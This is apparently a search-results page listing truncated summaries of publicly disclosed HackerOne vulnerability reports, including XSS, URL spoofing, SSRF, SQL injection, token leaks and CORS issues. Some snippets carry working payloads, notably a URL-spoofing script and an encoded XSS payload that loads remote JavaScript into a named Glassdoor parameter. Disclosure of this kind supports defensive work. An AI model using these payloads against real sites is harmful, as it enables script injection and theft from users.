HackerOne Reports
Search through disclosed security reports
10,350 reports found
Showing 1481 - 1500
## Summary: It's possible to open links pointing to `file:///` origin from web pages using "Open link in a new tab" in context menu. > https://hackerone.com/bugs?report_id=369185 shows unsafe `ssh://` protocol handling, which leads to information leak using ssh (OS username, etc.). The vulnerability is highly available, so it's possible to …
## Summary: URL spoofing vulnerability. ## Repro ``` <script> window.onclick = function () { x = window.open('https://www.google.com/csi'); setTimeout(function () { x.document.write(`I am not a www.google.com;<button onclick="alert('I can run JS on this page!')">click me</button>`) }, 100); } </script> ``` URL in address bar is `https://www.google.com/csi`, but actually that's about:blank page. Attacker …
Nextcloud doesn't have a header setting for X-Content-Type-Options, which means it is vulnerable to MIME sniffing. The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to Google Chrome when downloading extensions. This reduces exposure to …
# Description Missing input validation of host names returned by Domain Name Servers in node's `dns` library can lead to output of wrong hostnames (leading to Domain Hijacking) and injection vulnerabilities in applications using the library (leading to Remote Code Execution, XSS, Application crashes, etc.). # Discoverer(s)/Credits Philipp Jeitner, Fraunhofer …
## Summary: Hi Logitech team, on streamlabs.com the endpoint: `streamlabs.com/global/identity?popup=1&r=protocol://merch.streamlabs.com` redirects any authenticated user to an arbitrary protocol, and it merges the redirect link with an access_token. {F1281409} This means that if a malicious app that handles the protocol is installed on the device, the access token will be stolen …
Report Submission Form ## Summary: csi-snapshot-controller crashes when processing VolumeSnapshot with non-existing PVC ## Kubernetes Version: 1.19 ## Component Version: snapshot-controller from external-snapshotter repo ver 3.0.0 https://github.com/kubernetes-csi/external-snapshotter/releases/tag/v3.0.0 ## Steps To Reproduce: 1. Install Kubernetes 1.19 with snapshot-controller v3.0.0 1. Create VolumeSnapshot object with empty spec.volumeSnapshotClass and spec.source.persistentVolumeClaimName = <non-existing PVC …
A .env file was discovered on the server at ████, exposing sensitive application configurations, including database credentials, email settings, and more. This information could allow an attacker to gain unauthorized access to critical systems and services. **Steps to Reproduce:** 1. Open a web browser. 2. Navigate to ████████. 3. The …
## SUMMARY: A few important functions of yelp.com are vulnerable to ClickJacking Attack. ## DESCRIPTION: Please have an Introduction about the vulnerability Type: https://en.wikipedia.org/wiki/Clickjacking ClickJacking is similar to CSRF with just an extra involvement of the victim to click somewhere on the ClickJacked page (which is usually done very easily). It bypasses CSRF …
## Description ----- The inconsistent of URL parsing and URL fetching are distinct ## Original bug report ----- - https://bugs.python.org/issue30500 - http://python-security.readthedocs.io/vuln/bpo-30500_urllib_connects_to_a_wrong_host.html ## Note ----- - None Thanks :) ## Impact SSRF
**Description:** The following param allows an attacker to trick people into downloading malicious files, scripts and other payloads. https://██████████?url=https://<MaliciousURL> PoC 1. I will show you how the page looks normally without any changes. If you directly access https://███ you will be shown the following page. You can click on 'Click …
The endpoint https://www.glassdoor.com/Interview/Accenturme-Interview-Questions-E9931.htm is vulnerable to reflected XSS. Affected Parameter: filter.jobTitleFTS Browsers tested: Chrome, Firefox Payload: %3c%3c%3ca%3ea%3escript%20SrC%3d%22%68%74%74%70s%3a%2f%2f%73%6b%69%6e%6e%79%2d%66%65%61%72%2e%73%75%72%67%65%2e%73%68%2f%70%61%79%6c%6f%61%64%2e%6a%73%22%3e%3c%3c%3ca%3ea%3e%2fscript%3e Decoded: <<<a>a>script SrC="https://skinny-fear.surge.sh/payload.js"><<<a>a>/script> Steps To Reproduce: 1. Navigate to https://www.glassdoor.com/Interview/Accenture-Interview-Questions-E4138.htm?filter.jobTitleFTS=Business%20Analyst 2. Add a parameter countryRedirect=True 3. Because of this parameter the browser does not get redirected to another page when we enter payload. …
### Summary *pip* is probably the most popular *Python* package manager and can be used to install packages from the publicly available *Python Package Index* (*PyPi*) at [pypi.org](https://pypi.org) or from internal package repositories. In the beginning of 2021, a vulnerability type called *Dependency Confusion* attracted some attention in the information …
Hi, the ████ was vulnerable to time based injection via referer header #steps 1- copy the request to your burp suite : ```GET /DNCdb.php?alert= HTTP/1.1 Host: ███████ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close ████=* Upgrade-Insecure-Requests: 1 Referer: …
## Summary: Hello, The support section has a validation on all the posted messages where it doesn't allow you to edit your messages after some minutes from posting them. I was able to bypass this protection and edit successfully the previous messages that can't be edited. After further investigation, I …
The page located at `https://sal.██████.com/list/Activity/hour/all/0/` suffers from a Cross-site Scripting (XSS) vulnerability when a user has set their hostname on their machine to an XSS payload. ##### Vulnerable Page `https://sal.██████.com/list/Activity/hour/all/0/` ##### Victim IP Address `███████` ##### Referer `https://sal.██████.com/` ##### User Agent `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, …
Step-by-step Reproduction : Send this request: ``` GET /██████████ HTTP/1.1 Host: █████ Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close █████████ Origin: http://attacker.com ``` Receive : ``` HTTP/1.1 200 OK Cache-Control: max-age=0,must-revalidate Expires: Wed, 31 Dec 1969 16:00:00 PST Vary: Origin …